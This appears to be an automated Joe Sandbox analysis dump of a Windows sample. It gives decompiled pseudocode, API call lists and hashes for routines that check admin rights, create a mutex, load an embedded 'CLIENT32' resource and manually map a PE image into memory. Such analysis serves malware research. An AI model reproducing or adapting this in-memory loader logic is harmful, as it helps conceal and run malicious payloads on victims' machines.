    0x00d324e3
    0x00d324e8
    0x00d324e5
    0x00d324e5
    0x00d324e5
    0x00d324ef
    0x00d324f6
    0x00d324f6
    0x00d32509

    APIs
    • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00D324BF
    • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00D324DB
    • GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324E8
    • FlushFileBuffers.KERNEL32(00000000), ref: 00D324EF
    • CloseHandle.KERNEL32(00000000), ref: 00D324F6
    • GetLastError.KERNEL32(?,00D3337A,?,?,?,?,?,?,00D31E68,?,?,?,?), ref: 00D324FE
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: File$ErrorLast$BuffersCloseCreateFlushHandleWrite
    • String ID:
    • API String ID: 3976640885-0
    • Opcode ID: 52dc81c44de24fc20751ecf245aac598e3708ffbbadedf96d4171974542e102c
    • Instruction ID: 983b5a8c72a6151183f4f0b84a412df922dc32bbe111943ae6333cce0e3f40db
    • Opcode Fuzzy Hash: 52dc81c44de24fc20751ecf245aac598e3708ffbbadedf96d4171974542e102c
    • Instruction Fuzzy Hash: 23F0F93A601226BBD7251F66EC4CEFF7E2CEB567B2B148015FA0AC1260C7308551D6F0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E00D31434(void* __eflags) {
    				void* _t6;
    
    				__imp__#680();
    				_t6 = E00D32291(__eflags);
    				if(_t6 != 0) {
    					if(GetLastError() != 0xb7) {
    						E00D313D0("CLIENT32");
    					}
    					CloseHandle(_t6);
    				}
    				return 0;
    			}




    0x00d31435
    0x00d31440
    0x00d31444
    0x00d31451
    0x00d31458
    0x00d31458
    0x00d3145e
    0x00d3145e
    0x00d31466

    APIs
    • IsUserAnAdmin.SHELL32 ref: 00D31435
      • Part of subcall function 00D32291: _memset.LIBCMT ref: 00D322A1
      • Part of subcall function 00D32291: CreateMutexA.KERNELBASE(7622DAA3,00000000,Global\{3D5A1694-CC2C-4ee7-A3D5-A879A9E3A62A},7622DAA3,001F0001,?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322C5
      • Part of subcall function 00D32291: GetLastError.KERNEL32(?,?,00000000,7622DAA3,00D3232C,00000000), ref: 00D322D1
    • GetLastError.KERNEL32(?,?), ref: 00D31446
    • CloseHandle.KERNEL32(00000000), ref: 00D3145E
      • Part of subcall function 00D313D0: FindResourceA.KERNEL32(00000000,00D3145D,0000000A), ref: 00D313D8
      • Part of subcall function 00D313D0: LoadResource.KERNEL32(00000000,00000000,?,?), ref: 00D313E5
      • Part of subcall function 00D313D0: LockResource.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00D313F3
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: Resource$ErrorLast$AdminCloseCreateFindHandleLoadLockMutexUser_memset
    • String ID: CLIENT32
    • API String ID: 2587862435-3575452709
    • Opcode ID: 48b58c5e3f7b6bcf8dfce80ba967adb0b269f3a6f466cacbf9f9f0c6e95f48a6
    • Instruction ID: 2e4f45d10baf73aa5a05b32ee1dcf0707059ad03215f9a8f6a10bec5f7078a0e
    • Opcode Fuzzy Hash: 48b58c5e3f7b6bcf8dfce80ba967adb0b269f3a6f466cacbf9f9f0c6e95f48a6
    • Instruction Fuzzy Hash: B0D0123DD067234A935133757C095DE2250DF51B91F090520F904E1A11DB848C8301FA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D32062() {
    				void* _t1;
    				_Unknown_base(*)()* _t3;
    
    				if( *0xd359f4 == 0) {
    					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wvsprintfA");
    					 *0xd359f4 = _t3;
    					return _t3;
    				}
    				return _t1;
    			}





    0x00d32069
    0x00d3207c
    0x00d32082
    0x00000000
    0x00d32082
    0x00d32087

    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 00D32075
    • GetProcAddress.KERNEL32(00000000), ref: 00D3207C
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: user32.dll$wvsprintfA
    • API String ID: 2574300362-1331095676
    • Opcode ID: 603b3d6787676b9b5fc06d423124ff9e68be9da43f383e20c1e8cb839bad907f
    • Instruction ID: 132ae66bd9ec2b6b944c9e7d1bc9c5e94a9aca8d68a120a0de38c5c459e5e943
    • Opcode Fuzzy Hash: 603b3d6787676b9b5fc06d423124ff9e68be9da43f383e20c1e8cb839bad907f
    • Instruction Fuzzy Hash: 6EC012BE806343DEC7081B60AE0ABA13AA0A340712F000204A201C0268D7B004488B30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D32088() {
    				void* _t1;
    				_Unknown_base(*)()* _t3;
    
    				if( *0xd359f8 == 0) {
    					_t3 = GetProcAddress(LoadLibraryA("msvcrt.dll"), "_vscprintf");
    					 *0xd359f8 = _t3;
    					return _t3;
    				}
    				return _t1;
    			}





    0x00d3208f
    0x00d320a2
    0x00d320a8
    0x00000000
    0x00d320a8
    0x00d320ad

    APIs
    • LoadLibraryA.KERNEL32(msvcrt.dll), ref: 00D3209B
    • GetProcAddress.KERNEL32(00000000), ref: 00D320A2
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: _vscprintf$msvcrt.dll
    • API String ID: 2574300362-514782248
    • Opcode ID: 518752c880001793b1b9114d55ef18f10c3cb971d4bc0b4c280161096e2e3127
    • Instruction ID: debfb4d0afc444c24fb6e70794adec464b7feb66f261efa0adc45e43a1079d29
    • Opcode Fuzzy Hash: 518752c880001793b1b9114d55ef18f10c3cb971d4bc0b4c280161096e2e3127
    • Instruction Fuzzy Hash: EFC012FE802303DFC7480BA0AC0ABA03A60A300312F040084A620D0268D6B000888A30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D3203C() {
    				void* _t1;
    				_Unknown_base(*)()* _t3;
    
    				if( *0xd359f0 == 0) {
    					_t3 = GetProcAddress(LoadLibraryA("user32.dll"), "wsprintfA");
    					 *0xd359f0 = _t3;
    					return _t3;
    				}
    				return _t1;
    			}





    0x00d32043
    0x00d32056
    0x00d3205c
    0x00000000
    0x00d3205c
    0x00d32061

    APIs
    • LoadLibraryA.KERNEL32(user32.dll), ref: 00D3204F
    • GetProcAddress.KERNEL32(00000000), ref: 00D32056
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: AddressLibraryLoadProc
    • String ID: user32.dll$wsprintfA
    • API String ID: 2574300362-4095251970
    • Opcode ID: 7eff6ad78efe5f969c6b9ea5a512e1b459f893422179cb3616bbe088f079f6f1
    • Instruction ID: dce2c82c6579ed927810483bc9110cabc1a0ba473d82c0c77591d82145747ed9
    • Opcode Fuzzy Hash: 7eff6ad78efe5f969c6b9ea5a512e1b459f893422179cb3616bbe088f079f6f1
    • Instruction Fuzzy Hash: 6DC04CBE941743DFCB185B60FD0EB9536A8B704753F454254B652D1368D7B40088DE74
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00D31903(signed int* __ecx, signed int* _a4) {
    				intOrPtr* _v8;
    				signed int _v12;
    				struct HINSTANCE__* _v16;
    				intOrPtr _t40;
    				intOrPtr _t43;
    				struct HINSTANCE__* _t45;
    				intOrPtr _t48;
    				intOrPtr _t49;
    				signed int _t50;
    				CHAR* _t55;
    				_Unknown_base(*)()* _t56;
    				intOrPtr _t59;
    				signed int* _t60;
    				intOrPtr* _t64;
    				void* _t67;
    				intOrPtr* _t69;
    				signed int* _t71;
    				signed int _t79;
    
    				_t60 = __ecx;
    				_t64 = _a4;
    				_t40 =  *_t64;
    				_t59 =  *((intOrPtr*)(_t64 + 4));
    				_v12 = 1;
    				if( *((intOrPtr*)(_t40 + 0x84)) > 0) {
    					_t67 =  *((intOrPtr*)(_t40 + 0x80)) + _t59;
    					if(IsBadReadPtr(_t67, 0x14) == 0) {
    						_t69 = _t67 + 0x10;
    						_v8 = _t69;
    						while(1) {
    							_t43 =  *((intOrPtr*)(_t69 - 4));
    							if(_t43 == 0) {
    								goto L23;
    							}
    							_t45 = LoadLibraryA(_t43 + _t59);
    							_v16 = _t45;
    							if(_t45 == 0xffffffff) {
    								L22:
    								_v12 = _v12 & 0x00000000;
    							} else {
    								_t48 = E00D31509(_t60,  *((intOrPtr*)(_t64 + 8)), 4 +  *(_t64 + 0xc) * 4);
    								 *((intOrPtr*)(_t64 + 8)) = _t48;
    								if(_t48 == 0) {
    									goto L22;
    								} else {
    									 *((intOrPtr*)(_t48 +  *(_t64 + 0xc) * 4)) = _v16;
    									 *(_t64 + 0xc) =  *(_t64 + 0xc) + 1;
    									_t49 =  *((intOrPtr*)(_t69 - 0x10));
    									if(_t49 == 0) {
    										_t71 =  *_t69 + _t59;
    										_t60 = _t71;
    									} else {
    										_t71 = _t49 + _t59;
    										_t60 =  *_v8 + _t59;
    									}
    									_t50 =  *_t71;
    									if(_t50 != 0) {
    										_a4 = _t60;
    										_a4 = _a4 - _t71;
    										_t79 = _t50;
    										L12:
    										L12:
    										if(_t79 >= 0) {
    											_t55 = _t50 + _t59 + 2;
    										} else {
    											_t55 = _t50 & 0x0000ffff;
    										}
    										_t56 = GetProcAddress(_v16, _t55);
    										_t60 = _a4;
    										 *(_t60 + _t71) = _t56;
    										if( *(_t60 + _t71) == 0) {
    											goto L18;
    										}
    										_t71 =  &(_t71[1]);
    										_t50 =  *_t71;
    										if(_t50 != 0) {
    											goto L12;
    										} else {
    										}
    										goto L19;
    										L18:
    										_v12 = _v12 & 0x00000000;
    									}
    									L19:
    									if(_v12 != 0) {
    										_v8 = _v8 + 0x14;
    										if(IsBadReadPtr(_v8 + 0xfffffff0, 0x14) == 0) {
    											_t69 = _v8;
    											continue;
    										} else {
    										}
    									}
    								}
    							}
    							goto L23;
    						}
    					}
    					L23:
    				}
    				return _v12;
    			}





















    0x00d31903
    0x00d3190b
    0x00d3190e
    0x00d31917
    0x00d3191a
    0x00d31921
    0x00d31930
    0x00d3193b
    0x00d31941
    0x00d31944
    0x00d3194c
    0x00d3194c
    0x00d31951
    0x00000000
    0x00000000
    0x00d3195a
    0x00d31960
    0x00d31966
    0x00d31a15
    0x00d31a15
    0x00d3196c
    0x00d3197a
    0x00d3197f
    0x00d31984
    0x00000000
    0x00d3198a
    0x00d31990
    0x00d31993
    0x00d31996
    0x00d3199b
    0x00d319ab
    0x00d319ad
    0x00d3199d
    0x00d3199d
    0x00d319a5
    0x00d319a5
    0x00d319af
    0x00d319b3
    0x00d319b5
    0x00d319b8
    0x00d319bb
    0x00000000
    0x00d319bd
    0x00d319bd
    0x00d319c8
    0x00d319bf
    0x00d319bf
    0x00d319bf
    0x00d319cf
    0x00d319d5
    0x00d319d8
    0x00d319e1
    0x00000000
    0x00000000
    0x00d319e3
    0x00d319e6
    0x00d319ea
    0x00000000
    0x00000000
    0x00d319ec
    0x00000000
    0x00d319ee
    0x00d319ee
    0x00d319ee
    0x00d319f2
    0x00d319f6
    0x00d319f8
    0x00d31a0d
    0x00d31949
    0x00000000
    0x00000000
    0x00d31a13
    0x00d31a0d
    0x00d319f6
    0x00d31984
    0x00000000
    0x00d31966
    0x00d3194c
    0x00d31a19
    0x00d31a19
    0x00d31a20

    APIs
    • IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00D31933
    • LoadLibraryA.KERNEL32(?), ref: 00D3195A
    • GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00D319CF
    • IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00D31A05
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: Read$AddressLibraryLoadProc
    • String ID:
    • API String ID: 2438460464-0
    • Opcode ID: 33831874a2ca8202d181920f269f4385b7a265239a5b7bff103a2dff16f1a0aa
    • Instruction ID: 60f313fb160122449a44e2c4eb5997c8067082b8ebc47121da3ca67be3b7a7d0
    • Opcode Fuzzy Hash: 33831874a2ca8202d181920f269f4385b7a265239a5b7bff103a2dff16f1a0aa
    • Instruction Fuzzy Hash: DB31477AA00216EFDB10CF59C884BA9B7B8BF04355F288169E855E7390E770ED45CBB0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • SendInput.USER32(00000001,?,0000001C), ref: 00D330FF
    • SendInput.USER32(00000001,?,0000001C), ref: 00D33114
    • SendInput.USER32(00000001,?,0000001C), ref: 00D33127
    • SendInput.USER32(00000001,?,0000001C), ref: 00D3313A
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: InputSend
    • String ID:
    • API String ID: 3431551938-0
    • Opcode ID: 371a8a03efb92ec4790588972d0160a30d49319f4951e29619d6a9872b020d29
    • Instruction ID: 89f04844674382fae49dbdaed4fe38749903cfbf438ed6644698712a5d46396d
    • Opcode Fuzzy Hash: 371a8a03efb92ec4790588972d0160a30d49319f4951e29619d6a9872b020d29
    • Instruction Fuzzy Hash: 0601BA71D5021DA9EB00DFA59C41BFFFBBCEF55710F10501BA604E6190D2B45A418BE5
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 62%
    			E00D31A94(void* __edi, signed short* _a4) {
    				void* _v8;
    				signed short* _v12;
    				void* _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				void* _v28;
    				signed int* _v32;
    				intOrPtr* _v36;
    				signed int* _t129;
    				intOrPtr _t131;
    				void* _t132;
    
    				_t132 = __edi;
    				_v12 = _a4;
    				if(( *_v12 & 0x0000ffff) == 0x5a4d) {
    					_v36 = _a4 + _v12[0x1e];
    					if( *_v36 == 0x4550) {
    						_v16 = VirtualAlloc( *(_v36 + 0x34),  *(_v36 + 0x50), 0x2000, 4);
    						if(_v16 == 0) {
    							_v16 = VirtualAlloc(0,  *(_v36 + 0x50), 0x2000, 4);
    						}
    						if(_v16 != 0) {
    							_v28 = E00D314F3(0x14);
    							 *((intOrPtr*)(_v28 + 4)) = _v16;
    							 *(_v28 + 0xc) =  *(_v28 + 0xc) & 0x00000000;
    							 *(_v28 + 8) =  *(_v28 + 8) & 0x00000000;
    							 *(_v28 + 0x10) =  *(_v28 + 0x10) & 0x00000000;
    							VirtualAlloc(_v16,  *(_v36 + 0x50), 0x1000, 4);
    							_v8 = VirtualAlloc(_v16,  *(_v36 + 0x54), 0x1000, 4);
    							_push(_v12[0x1e] +  *(_v36 + 0x54));
    							_push(_v12);
    							_push(_v8);
    							E00D31489();
    							 *_v28 = _v8 + _v12[0x1e];
    							 *((intOrPtr*)( *_v28 + 0x34)) = _v16;
    							E00D3171C(_a4, _v36, _v28);
    							_t129 = _v16 -  *(_v36 + 0x34);
    							_v32 = _t129;
    							if(_t129 != 0) {
    								E00D31884(_v28, _v32);
    							}
    							if(E00D31903(_t129, _v28) != 0) {
    								E00D317BF(_t129, _v28);
    								if( *((intOrPtr*)( *_v28 + 0x28)) == 0) {
    									L18:
    									return _v28;
    								}
    								_t131 = _v16 +  *((intOrPtr*)( *_v28 + 0x28));
    								_v24 = _t131;
    								if(_t131 != 0) {
    									_v20 = _v24(_v16, 1, 0);
    									if(_v20 != 0) {
    										 *(_v28 + 0x10) = 1;
    										goto L18;
    									}
    									goto L19;
    								}
    								goto L19;
    							} else {
    								L19:
    								E00D31A23(_t132, _v28);
    								return 0;
    							}
    						} else {
    							return 0;
    						}
    					}
    					return 0;
    				}
    				return 0;
    			}














    0x00d31a94
    0x00d31a9d
    0x00d31aab
    0x00d31abd
    0x00d31ac9
    0x00d31aeb
    0x00d31af2
    0x00d31b09
    0x00d31b09
    0x00d31b10
    0x00d31b20
    0x00d31b29
    0x00d31b2f
    0x00d31b36
    0x00d31b3d
    0x00d31b51
    0x00d31b6d
    0x00d31b7c
    0x00d31b7d
    0x00d31b80
    0x00d31b83
    0x00d31b94
    0x00d31b9e
    0x00d31baa
    0x00d31bb5
    0x00d31bb8
    0x00d31bbb
    0x00d31bc3
    0x00d31bc3
    0x00d31bd2
    0x00d31bdb
    0x00d31be9
    0x00d31c20
    0x00000000
    0x00d31c20
    0x00d31bf3
    0x00d31bf6
    0x00d31bf9
    0x00d31c09
    0x00d31c10
    0x00d31c19
    0x00000000
    0x00d31c19
    0x00000000
    0x00d31c12
    0x00000000
    0x00d31bd4
    0x00d31c25
    0x00d31c28
    0x00000000
    0x00d31c2d
    0x00d31b12
    0x00000000
    0x00d31b12
    0x00d31b10
    0x00000000
    0x00d31acb
    0x00000000

    APIs
    • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,?,?,00D31426,00000000,?,00000000,?,?,?), ref: 00D31AE5
    • VirtualAlloc.KERNEL32(00000000,?,00002000,00000004,?,?,?,00D31426,00000000), ref: 00D31B03
      • Part of subcall function 00D314F3: VirtualAlloc.KERNEL32(00000000,00000004,00003000,00000004,00D31408,?,?,?), ref: 00D31500
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,00000014,?,?,?,00D31426,00000000), ref: 00D31B51
    • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?,00D31426,00000000), ref: 00D31B67
      • Part of subcall function 00D3171C: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00D3176D
      • Part of subcall function 00D3171C: VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,00000000,00000000,?,00000000), ref: 00D3178A
      • Part of subcall function 00D31903: IsBadReadPtr.KERNEL32(?,00000014,00000000,?,00000000,?), ref: 00D31933
      • Part of subcall function 00D31903: LoadLibraryA.KERNEL32(?), ref: 00D3195A
      • Part of subcall function 00D31903: GetProcAddress.KERNEL32(?,00000012,?,?), ref: 00D319CF
      • Part of subcall function 00D31903: IsBadReadPtr.KERNEL32(-000000DC,00000014,?,?), ref: 00D31A05
      • Part of subcall function 00D317BF: VirtualFree.KERNEL32(?,?,00004000,?,00000000,00000000,?,?,?,00D31BE0,?,?,00000000,?,?,?), ref: 00D3180F
      • Part of subcall function 00D317BF: VirtualProtect.KERNEL32(?,?,?,00000000,?,00000000,00000000,?,?,?,00D31BE0,?,?,00000000,?,?), ref: 00D3185B
      • Part of subcall function 00D31A23: FreeLibrary.KERNEL32(?,?,00000000,00000000,00D31C2D,?,?,?,?,00D31426), ref: 00D31A60
      • Part of subcall function 00D31A23: VirtualFree.KERNEL32(?,00000000,00008000,00000000,00000000,00D31C2D,?,?,?,?,00D31426), ref: 00D31A83
    Memory Dump Source
    • Source File: 00000002.00000002.1212803884.00D31000.00000020.sdmp, Offset: 00D30000, based on PE: true
    • Associated: 00000002.00000002.1212798513.00D30000.00000002.sdmp
    • Associated: 00000002.00000002.1212811993.00D35000.00000004.sdmp
    • Associated: 00000002.00000002.1212817413.00D36000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_d30000_cnwog.jbxd
    Similarity
    • API ID: Virtual$Alloc$Free$LibraryRead$AddressLoadProcProtect
    • String ID:
    • API String ID: 4109881786-0
    • Opcode ID: d84faa41cb39c09d247b2410976774e02c42f2e3a98f26450348123d5874c21c
    • Instruction ID: 0e09529365e91bffa2aeadf0dd99e331c5f27be522d310cb66a520937b964c26
    • Opcode Fuzzy Hash: d84faa41cb39c09d247b2410976774e02c42f2e3a98f26450348123d5874c21c
    • Instruction Fuzzy Hash: 5351C279A0020AEFDF05DF94C986FAEBBB1FF08315F045099E601AB2A1D3759990DF60
    Uniqueness

    Uniqueness Score: -1.00%